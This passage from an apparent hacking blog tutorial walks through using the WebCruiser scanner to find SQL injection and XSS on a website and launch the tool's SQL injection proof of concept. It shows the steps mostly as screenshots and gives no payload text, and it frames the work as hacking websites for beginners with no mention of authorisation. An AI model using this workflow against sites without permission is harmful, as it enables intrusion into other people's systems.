check if the target is Vulnerable or not?</span></span></span><br /> <span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 15px;"><br /></span></span></span> Screenshot:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ5x52baFIF0JBFEKUnJsaXGoSDeXkk-wkIZzVUyGqBq4PwAQ0SA28vQtg4k9AVQcqjsT7gzjVhczficOOdNyMC4bis7hak_s74-alewTAUiYkDhyUk9Fd8LbN32wbCB-DlkKG7eBLa1M/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ5x52baFIF0JBFEKUnJsaXGoSDeXkk-wkIZzVUyGqBq4PwAQ0SA28vQtg4k9AVQcqjsT7gzjVhczficOOdNyMC4bis7hak_s74-alewTAUiYkDhyUk9Fd8LbN32wbCB-DlkKG7eBLa1M/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" width="640" /></a></div> <br /> Then Scan the Site:<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl09L9enzlVBFQ948OA5v6T9uIx72CnIww__gNWddwRpqCRoh2LeCuoG6eTkHx3_z5dQlzRHY0OUrrn8TG82XlDDlvrPBqgoejkOVPJknLAfTHzwyRsgBbfPpbeWGIAD3wbdEa_DrO9ko/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="470" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl09L9enzlVBFQ948OA5v6T9uIx72CnIww__gNWddwRpqCRoh2LeCuoG6eTkHx3_z5dQlzRHY0OUrrn8TG82XlDDlvrPBqgoejkOVPJknLAfTHzwyRsgBbfPpbeWGIAD3wbdEa_DrO9ko/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" width="640" /></a></div> <br /> Then Waite for some time so that the scanner can give you the result:<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxY7a4L25HJ50JTPrawpBGXh0tjrLJj7DuzcNqNKW2gJ4j_4V1TYN-tuBv5k8306sOoj0H7lhRtdapfrw2AL7INgCRat2KBiKKZ9pYHy8CD5j45BYjGS0oe7kkNrtdwwPLVKNXi7Vd9jY/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxY7a4L25HJ50JTPrawpBGXh0tjrLJj7DuzcNqNKW2gJ4j_4V1TYN-tuBv5k8306sOoj0H7lhRtdapfrw2AL7INgCRat2KBiKKZ9pYHy8CD5j45BYjGS0oe7kkNrtdwwPLVKNXi7Vd9jY/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" width="640" /></a></div> <br /> <br /> <span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif; font-size: 15px;">As we can see the website is vulnerable to Sql injection & XSS. </span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 15px;"></span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 15px;"><br />Now We will perform a SQL injection .</span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 15px;"> </span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 15px;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 15px;"></span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 15px;"><span style="font-size: small;">[#] Attack</span></span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 15px;"></span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 15px;">Right click on the vulnerable url and then SQL INJECTION POC , now you<br />just follow my steps below.</span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 15px;"> </span></span><i style="background-color: #f9f9f9; color: #555555; font-family: Arial, Helvetica, sans-serif; font-size: 15px;"><br /></i><br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFvpuapanasJHLn4yCjh7idPHD0qAn9QBvmBzwKtmiYKS03jX_8J_0D84FRhUvIsTqmyqCAHjEiKZM13MKOOQjdehbO-WQHvM1NDm0niL4H54lGBkW-_fqYIdGbPHvX3VVV8sUJvHNq0Y/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="474" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFvpuapanasJHLn4yCjh7idPHD0qAn9QBvmBzwKtmiYKS03jX_8J_0D84FRhUvIsTqmyqCAHjEiKZM13MKOOQjdehbO-WQHvM1NDm0niL4H54lGBkW-_fqYIdGbPHvX3VVV8sUJvHNq0Y/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" width="640" /></a></div> <br /> Then:<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJOGMLPb-7fk1kkHagrr3zI3k6FP0gXl8v_pe2sH15L6_cFLlllipc0C14Vn1rGIuM85kOHjbUC5bfo3fOTs9DXV2j6Tl3ghjuHPEY6QabtH2Opnc9zUXqndwIQa-J6WF7sx9IB7Sh7TE/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJOGMLPb-7fk1kkHagrr3zI3k6FP0gXl8v_pe2sH15L6_cFLlllipc0C14Vn1rGIuM85kOHjbUC5bfo3fOTs9DXV2j6Tl3ghjuHPEY6QabtH2Opnc9zUXqndwIQa-J6WF7sx9IB7Sh7TE/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" width="640" /></a></div> <br /> Then<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWyIsN2mL7dAPA4C0tzAMS8mKz1plGVfh-_kq2NAD08NAHAiDDRkunJNJfgyZvVDtb1v9d46IGy9HHwbd5DmXRawXNRYDag4jutWv-SX0769T3bL8G0WbzhZOfb30wFNkaaQO5d5EZBvw/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWyIsN2mL7dAPA4C0tzAMS8mKz1plGVfh-_kq2NAD08NAHAiDDRkunJNJfgyZvVDtb1v9d46IGy9HHwbd5DmXRawXNRYDag4jutWv-SX0769T3bL8G0WbzhZOfb30wFNkaaQO5d5EZBvw/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" width="640" /></a></div> <br /> Then:<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz45i8CDIcf6q4E4xar11hglYoO4_Hl_ikbImq-bTe9GnJzZLi31Jeu6iwYAIzSjxaMoIoS1T773t_XIwEH5u_G0yR0FFsPsMdkSmjll9IZyKMa5pLrw0_DIiaUnqjkwnjqsSnni4pjcc/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz45i8CDIcf6q4E4xar11hglYoO4_Hl_ikbImq-bTe9GnJzZLi31Jeu6iwYAIzSjxaMoIoS1T773t_XIwEH5u_G0yR0FFsPsMdkSmjll9IZyKMa5pLrw0_DIiaUnqjkwnjqsSnni4pjcc/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" width="640" /></a></div> Then:<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjnBR30_TtsalO_kQyuJ6ZaRZD_CbPCTuB3ex3wcNkz6vh8P5cvOdBxTP_txI9MYXQ9kEthLo20YfWRRs1rWbvD_DOU7vEKvOkLfc4oXo8HyZb20AeiB43nKKa-MifgDY-C8owIL3O2L8/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="394" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjnBR30_TtsalO_kQyuJ6ZaRZD_CbPCTuB3ex3wcNkz6vh8P5cvOdBxTP_txI9MYXQ9kEthLo20YfWRRs1rWbvD_DOU7vEKvOkLfc4oXo8HyZb20AeiB43nKKa-MifgDY-C8owIL3O2L8/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" width="640" /></a></div> Then:<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO88EHFq78eKfw-6D7_BwB9Df7QFwzLSodD45Svye4g3qiSVATPB6CRPtRjzd482mV4oHJ6Y6APpEEoo4OVRfcFEXQ-8w2gH8HFNdtyTGO8o0ApSyWmGeypcvB_8z-TB09XpPi4MtzbcM/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO88EHFq78eKfw-6D7_BwB9Df7QFwzLSodD45Svye4g3qiSVATPB6CRPtRjzd482mV4oHJ6Y6APpEEoo4OVRfcFEXQ-8w2gH8HFNdtyTGO8o0ApSyWmGeypcvB_8z-TB09XpPi4MtzbcM/s1600/Hack-A-Website-With-WebCruiser-Scanner.png" width="640" /></a></div> <br /> Hope You have Enjoyed the tutorial. And Dont Forget to Like our Facebook Fan Page :D

Hacking Tutorials Hack A Website With WebCruiser Scanner

Hay! Today i am going to tell you a method for hacking Websites. So i will to explain in such a way so that noobs can also understand this. I will Suggest you to try to practice hacking manually not by tools Because tools will not make your skills to…

Read more »